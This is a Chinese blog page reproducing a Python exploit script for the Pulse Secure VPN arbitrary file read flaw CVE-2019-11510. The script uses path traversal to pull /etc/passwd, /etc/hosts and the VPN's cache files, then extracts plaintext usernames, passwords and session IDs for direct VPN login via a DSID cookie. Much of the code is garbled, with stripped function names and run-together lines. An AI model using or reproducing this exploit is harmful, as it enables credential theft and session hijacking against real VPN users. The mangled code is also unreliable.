admin 管理员组文章数量: 887021
2024年2月7日发(作者:jquery ui设置日期选择范围)
import requestsimport e_warnings()import osimport sysfrom import urlparse,urljoinbanner = ''' _______ ________ ___ ___ __ ___ __ __ _____ __ ___
/ ____ / / ____| |__ / _ _ |/ _ /_ /_ | ____/_ |/ _
| | / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | | | | / | __|______/ /| | | || |__, |______| || |___ | | | | | | |____ / | |____ / /_| |_| || | / / | || |___) || | |_| | _____| |______| |____|___/ |_| /_/ |_||_|____/ |_|___/
python By StudyCat
'''print (banner)def exp(url): netloc = urlparse(url)[1] path = urlparse(url)[2] if path == '/': url = url elif path == '': url = url+'/' else: print("URL Error") return
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/', verify=False) if _code == 200 and 'root:x:0:0:root' in :
print(url + " ---------------> Vulnerablen") print('Extracting /etc/passwd') print ("Writing all files to output dir " + netloc) if not (netloc): (netloc) print(+"n") f = open(netloc+'/passwd','a') () ()
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/', verify=False) if _code == 200: print('Extracting /etc/hosts') print() f = open(netloc+'/hosts','a') (+"n") ()
print('Downloading /data/runtime/mtmp/lmdb/dataa/ to extract plaintext usernames and password')
r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/?/dana/html5acc/guacamole/', verify=False) if _code == 200: f = open(netloc+"/data_runtime_mtmp_lmdb_dataa_",'ab')
f = open(netloc+"/data_runtime_mtmp_lmdb_dataa_",'ab') (t) ()
f = open('data_runtime_mtmp_lmdb_dataa_','rb') users = [] buf = ne() while buf: n = (b'CN=') if n>0: for i in range(n): if i : indexx = (b'CN=',indexx+1) else: indexx = (b'CN=') t = buf[indexx:indexx+100] end = (b'x00') t = buf[indexx:indexx+end] (()) buf = ne()
()
users = list(set(users)) f = open(netloc+"/","a") for line in users: (line+"n") ()
print("Downloading /data/runtime/mtmp/lmdb/randomVal/ to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn") if _code == 200: f = open(netloc+"/data_runtime_mtmp_lmdb_randomVal_",'ab') (t) ()
f = open(netloc+"/data_runtime_mtmp_lmdb_randomVal_",'rb') sessionids = [] buf = ne() while buf: n = (b'randomVal') if n>0: for i in range(n): if i : indexx = (b'randomVal',indexx+9) else: indexx = (b'randomVal') t = buf[indexx:indexx+41] if len(t)==41 and b'x00' not in t: sid = t[9:].decode() (sid) buf = ne()
()
sessionids = list(set(sessionids)) f = open(netloc+'/','a') for sid in sessionids: print(sid) (sid+"n") ()
else: print(url + " ---------------> Not Vulnerable")def main(): url = [1] exp(url)if __name__ == '__main__': main() r = (url+'data-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/?/dana/html5acc/guacamole/', verify=False
main()
参考:转载请注明出处。
版权声明:本文标题:PulseSecure任意文件读取(CVE-2019-11510)漏洞 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/free/1707284401h513648.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论